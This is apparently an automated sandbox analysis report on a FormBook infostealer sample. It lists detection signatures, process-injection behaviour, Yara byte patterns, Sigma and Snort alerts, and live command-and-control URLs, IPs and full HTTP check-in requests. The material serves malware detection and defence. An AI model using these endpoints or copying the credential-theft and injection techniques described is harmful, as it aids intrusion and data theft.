Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hkLFB22XxS.exe

Overview

General Information

Sample name:hkLFB22XxS.exe
renamed because original name is a hash value
Original sample name:04268eb791ba671f136525002bd4f25526b6d3e64b2b7b4e169df2498a2ea033.exe
Analysis ID:1466070
MD5:46d91dbe786e1518a8715e29f5fba781
SHA1:5da70934c50a4a626ee73bc4797cfd24e60c5a96
SHA256:04268eb791ba671f136525002bd4f25526b6d3e64b2b7b4e169df2498a2ea033
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hkLFB22XxS.exe (PID: 64 cmdline: "C:\Users\user\Desktop\hkLFB22XxS.exe" MD5: 46D91DBE786E1518A8715E29F5FBA781)
    • svchost.exe (PID: 3776 cmdline: "C:\Users\user\Desktop\hkLFB22XxS.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • YcTurzUREEPNDwUlDlxzRT.exe (PID: 5464 cmdline: "C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • convert.exe (PID: 592 cmdline: "C:\Windows\SysWOW64\convert.exe" MD5: 2B1AC34AB72C95793CFE7E936F15389D)
          • YcTurzUREEPNDwUlDlxzRT.exe (PID: 280 cmdline: "C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1088 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2dda3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x173c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a830:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13e4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2cfa3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2dda3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\hkLFB22XxS.exe", CommandLine: "C:\Users\user\Desktop\hkLFB22XxS.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\hkLFB22XxS.exe", ParentImage: C:\Users\user\Desktop\hkLFB22XxS.exe, ParentProcessId: 64, ParentProcessName: hkLFB22XxS.exe, ProcessCommandLine: "C:\Users\user\Desktop\hkLFB22XxS.exe", ProcessId: 3776, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\hkLFB22XxS.exe", CommandLine: "C:\Users\user\Desktop\hkLFB22XxS.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\hkLFB22XxS.exe", ParentImage: C:\Users\user\Desktop\hkLFB22XxS.exe, ParentProcessId: 64, ParentProcessName: hkLFB22XxS.exe, ProcessCommandLine: "C:\Users\user\Desktop\hkLFB22XxS.exe", ProcessId: 3776, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:07/02/24-14:03:53.795147
            SID:2855465
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-14:04:07.263536
            SID:2855465
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-14:02:54.728878
            SID:2855465
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-14:04:48.099149
            SID:2855465
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-14:05:14.826284
            SID:2855465
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-14:05:01.357570
            SID:2855465
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-14:04:33.563081
            SID:2855465
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-14:05:57.280319
            SID:2855465
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-14:05:28.296564
            SID:2855465
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-14:05:42.763941
            SID:2855465
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-14:03:26.452953
            SID:2855465
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-14:04:20.406030
            SID:2855465
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-14:03:39.747488
            SID:2855465
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.rebornqababy.ru/waey/Avira URL Cloud: Label: malware
            Source: http://www.autonomyai.xyz/b2v9/?GBbljTO=0sOIBL6Y1M004sQ5TvZd5iz/+VJrlsE2TnBUG2Cle0uPodabdAFumCtHEYRGqgGZaXBiOoh6miWUokUDwH1uxZLkB2zaEttNK0EmqhWvcq3hRWFyql4+CgnPikYYPSDEc9yry/0=&mB=rL4lPAvira URL Cloud: Label: malware
            Source: http://www.erosonline.com.br/2lcx/Avira URL Cloud: Label: malware
            Source: http://www.autonomyai.xyz/b2v9/Avira URL Cloud: Label: malware
            Source: http://www.bulletinnest.com/r7gq/Avira URL Cloud: Label: malware
            Source: http://www.bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lPAvira URL Cloud: Label: malware
            Source: http://www.erosonline.com.br/2lcx/?mB=rL4lP&GBbljTO=a0QfEZLGBdPS9CupDmnnPsWDKzErLSGek8yDxBQcwyKMQFiimN077KRHkaCGiYerfpBHWbRAiBI+CxxxyL+dNlx1E9UxGMH9Wp+KkC7SZXFmjq4jPFSCThF16iUos8QU5jw0D9M=Avira URL Cloud: Label: malware
            Source: http://www.rebornqababy.ru/waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQLvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMraqkdBe97SwcqQ2Bw4z4=Avira URL Cloud: Label: malware
            Source: http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: hkLFB22XxS.exeReversingLabs: Detection: 67%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: hkLFB22XxS.exeJoe Sandbox ML: detected
            Source: hkLFB22XxS.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: convert.pdb source: svchost.exe, 00000002.00000002.2571611959.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540180988.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000003.2509356666.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578051292.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493538091.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4570865384.0000000000A0E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: hkLFB22XxS.exe, 00000001.00000003.2109624765.0000000004110000.00000004.00001000.00020000.00000000.sdmp, hkLFB22XxS.exe, 00000001.00000003.2108731153.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2478694477.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2476600596.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.000000000309E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2573868861.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2571707288.00000000029F2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: hkLFB22XxS.exe, 00000001.00000003.2109624765.0000000004110000.00000004.00001000.00020000.00000000.sdmp, hkLFB22XxS.exe, 00000001.00000003.2108731153.0000000004260000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2478694477.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2476600596.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2571696469.000000000309E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 00000008.00000002.4579007671.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4579007671.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2573868861.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2571707288.00000000029F2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: convert.pdbGCTL source: svchost.exe, 00000002.00000002.2571611959.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540180988.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000003.2509356666.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578051292.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: convert.exe, 00000008.00000002.4580175851.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.0000000002DCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2852069782.000000003189C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: convert.exe, 00000008.00000002.4580175851.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578831605.0000000002DCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2852069782.000000003189C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00874696 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00874696
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0087C9C7
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087C93C FindFirstFileW,FindClose,1_2_0087C93C
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0087F200
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0087F35D
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0087F65E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00873A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00873A2B
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00873D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00873D4E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0087BF27
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_0024BB30 FindFirstFileW,FindNextFileW,FindClose,8_2_0024BB30
            Source: C:\Windows\SysWOW64\convert.exeCode function: 4x nop then xor eax, eax8_2_00239720
            Source: C:\Windows\SysWOW64\convert.exeCode function: 4x nop then mov ebx, 00000004h8_2_02AA0548

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49719 -> 65.181.132.158:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49724 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49730 -> 203.161.43.228:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49734 -> 38.47.158.215:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49738 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49743 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49747 -> 15.197.142.173:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49751 -> 108.186.253.49:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49755 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49759 -> 87.236.19.243:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49763 -> 135.181.212.206:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49768 -> 191.6.208.133:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49772 -> 188.114.97.3:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.cloudsoda.xyz
            Source: DNS query: www.d99qtpkvavjj.xyz
            Source: DNS query: www.autonomyai.xyz
            Source: Joe Sandbox ViewIP Address: 203.161.43.228 203.161.43.228
            Source: Joe Sandbox ViewIP Address: 135.181.212.206 135.181.212.206
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008825E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_008825E2
            Source: global trafficHTTP traffic detected: GET /r4wk/?mB=rL4lP&GBbljTO=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOIdv2Hpbl0D0DeBG+01R28dU1nzrJm0yQzAnZDQ+iQUJ8Z49zmcM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jl884.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /r4rr/?mB=rL4lP&GBbljTO=P1tofVXty140xBSVPpIW7gyirVvbbq4ZmtvRMfQ3vINp97U+jPeKOpbNf/zhxpBeUYTaF1cbY1dyJwJUzhljlqDDW4HDHYbLyZqwGog3PQGSgYYOSWyGo81KbSWrkgyrx66NLVM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.d99qtpkvavjj.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /02nb/?GBbljTO=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71eMMWXuG1yY1QMiMjNPzXdj8brJHDqS7NAGlwA4SgIkhB8sM3B24=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.firmshow.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /g67v/?mB=rL4lP&GBbljTO=c8M7uxZhudpInUsrkR2DFEXxpEFo+k2F1tpwZ/KeEHHRQR8ISdL3H7dZekm83GXANV8iiloQGx74ti2jjfGNAYcI3yUU4CBSy8RpmuksmnDwDcPq/qJ2CnRI4iJcuZj+GnE/ihc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jl800.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /frbh/?GBbljTO=Ab6vpDSK2Brwe75JZoMyqaMvDHsAkCPA2P9OUDXWAzTXqR+fdlaTQvVfgW4hOBJepAqkmb7wk13CIWkS+xjXxgvfntXYbzbMYjBsDXbn2M5yrvr+d9Np/nCfHBQ0eV5fDAaNGRM=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.theridleysuk.co.ukUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a7b7/?mB=rL4lP&GBbljTO=WBvhIJsiSZ/Mpf8vspJrW/4pjpLKDJYga2inWWxcAarnmjt55lmBuwg8tb7lhDgj0p/kM0sabX/Eh7nxTer92pVV4vHw9Nn4rOH01OSzROy3Dd2AlIGGpSa7+8s++24x8ediPqQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dexiangovernment.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /b2v9/?GBbljTO=0sOIBL6Y1M004sQ5TvZd5iz/+VJrlsE2TnBUG2Cle0uPodabdAFumCtHEYRGqgGZaXBiOoh6miWUokUDwH1uxZLkB2zaEttNK0EmqhWvcq3hRWFyql4+CgnPikYYPSDEc9yry/0=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.autonomyai.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
